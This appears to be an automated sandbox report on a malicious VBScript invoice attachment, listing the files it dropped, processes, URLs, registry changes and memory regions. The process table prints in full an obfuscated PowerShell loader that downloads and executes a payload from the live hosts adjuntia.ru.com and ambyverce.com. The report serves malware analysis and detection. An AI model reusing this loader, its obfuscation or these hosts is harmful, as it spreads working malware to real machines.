Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
INVOICE_DF76K.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0o4oced3.sxo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qufbxqu.w2q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqo2ziok.hts.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhxffuwj.1as.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Spisefisk.Pur
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function
konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'(
$Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive
'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj
0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1
Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive
'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi
EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa
Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd
cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive
'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive
'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP
,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl
Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre
Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns
orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero
,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP
O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr
Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny
racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou
ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3
Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl
Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok
B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes
Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra
eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF
rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA
icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb
Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh
Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive
'.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ')
;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall
N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe
eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib
UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue
Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt
') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol
feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran
vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive
'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee
AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom
MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors
');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl
ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn
K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn
SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma:
f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d
.vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$
AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function
konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'(
$Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive
'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj
0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1
Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive
'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi
EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa
Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd
cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive
'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive
'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP
,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl
Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre
Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns
orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero
,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP
O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr
Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny
racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou
ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3
Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl
Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok
B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes
Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra
eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF
rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA
icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb
Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh
Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive
'.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ')
;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall
N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe
eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib
UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue
Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt
') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol
feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran
vigt Fi e StenU satKons Jeaa$KommCG,psl Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive
'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee
AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom
MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors
');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl
ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn
K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn
SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma:
f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d
.vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$
AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;"
|
|
|
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://adjuntia.ru.com/wp-includes/img/Appliances.smi
|
185.221.216.115
|
||
|
https://ambyverce.com/Appliances.smi
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://adjuntia.ru.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://adjuntia.ru.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ambyverce.com/Appliances.smid
|
unknown
|
There are 9 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
adjuntia.ru.com
|
185.221.216.115
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.221.216.115
|
adjuntia.ru.com
|
United Kingdom
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
C8EC000
|
direct allocation
|
page execute and read and write
|
|
|
|
266CF20D000
|
trusted library allocation
|
page read and write
|
|
|
|
8D80000
|
direct allocation
|
page execute and read and write
|
|
|
|
60CE000
|
trusted library allocation
|
page read and write
|
|
|
|
7FF848E32000
|
trusted library allocation
|
page read and write
|
||
|
21ADBB5D000
|
heap
|
page read and write
|
||
|
21ADDA11000
|
heap
|
page read and write
|
||
|
2B7D000
|
stack
|
page read and write
|
||
|
FFF0443000
|
stack
|
page read and write
|
||
|
266BD664000
|
heap
|
page read and write
|
||
|
8AAB000
|
stack
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
4D9F000
|
stack
|
page read and write
|
||
|
7872000
|
heap
|
page read and write
|
||
|
4DB8000
|
trusted library allocation
|
page read and write
|
||
|
88E5000
|
trusted library allocation
|
page read and write
|
||
|
266BD5C4000
|
heap
|
page read and write
|
||
|
266BD5C2000
|
heap
|
page read and write
|
||
|
29C16F9000
|
stack
|
page read and write
|
||
|
1D1D8950000
|
heap
|
page read and write
|
||
|
21ADD9DE000
|
heap
|
page read and write
|
||
|
21ADDBBF000
|
heap
|
page read and write
|
||
|
266BD6A0000
|
heap
|
page read and write
|
||
|
21ADD680000
|
heap
|
page read and write
|
||
|
8B30000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
29C1EFF000
|
stack
|
page read and write
|
||
|
266CF1B0000
|
trusted library allocation
|
page read and write
|
||
|
574D000
|
trusted library allocation
|
page read and write
|
||
|
FFF048E000
|
stack
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C70000
|
trusted library section
|
page read and write
|
||
|
21ADBAE0000
|
heap
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
7DF473C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D90000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
29C1AFF000
|
stack
|
page read and write
|
||
|
266C104C000
|
trusted library allocation
|
page read and write
|
||
|
76D8000
|
heap
|
page read and write
|
||
|
21ADDB6F000
|
heap
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
21ADBB48000
|
heap
|
page read and write
|
||
|
21ADBC10000
|
heap
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
266C0F9F000
|
trusted library allocation
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
21ADDC21000
|
heap
|
page read and write
|
||
|
21ADBBB9000
|
heap
|
page read and write
|
||
|
21ADDB5E000
|
heap
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
1D1D88D0000
|
heap
|
page read and write
|
||
|
4E7B000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAEC000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
21ADBAED000
|
heap
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
21ADDAD0000
|
heap
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
29C18FE000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ADBBFC000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
1D1D8900000
|
heap
|
page read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
29C1BFE000
|
stack
|
page read and write
|
||
|
4CC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848C52000
|
trusted library allocation
|
page read and write
|
||
|
266BD5FE000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
8B78000
|
heap
|
page read and write
|
||
|
21ADDA11000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
21ADDA1A000
|
heap
|
page read and write
|
||
|
266BF5E6000
|
trusted library allocation
|
page read and write
|
||
|
21ADDAEE000
|
heap
|
page read and write
|
||
|
266D7530000
|
heap
|
page read and write
|
||
|
7DCB000
|
stack
|
page read and write
|
||
|
FFEF4FE000
|
stack
|
page read and write
|
||
|
21ADBB82000
|
heap
|
page read and write
|
||
|
21ADDAF4000
|
heap
|
page read and write
|
||
|
21ADD9D4000
|
heap
|
page read and write
|
||
|
21ADDB9C000
|
heap
|
page read and write
|
||
|
266BF6C2000
|
trusted library allocation
|
page read and write
|
||
|
21ADDB21000
|
heap
|
page read and write
|
||
|
8A6C000
|
stack
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
21ADD9D1000
|
heap
|
page read and write
|
||
|
21ADDA20000
|
heap
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
266C0FB1000
|
trusted library allocation
|
page read and write
|
||
|
21ADD9D0000
|
heap
|
page read and write
|
||
|
7969000
|
heap
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
7FF848D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
21ADDB28000
|
heap
|
page read and write
|
||
|
21ADDB76000
|
heap
|
page read and write
|
||
|
21ADD9E2000
|
heap
|
page read and write
|
||
|
21ADDBBF000
|
heap
|
page read and write
|
||
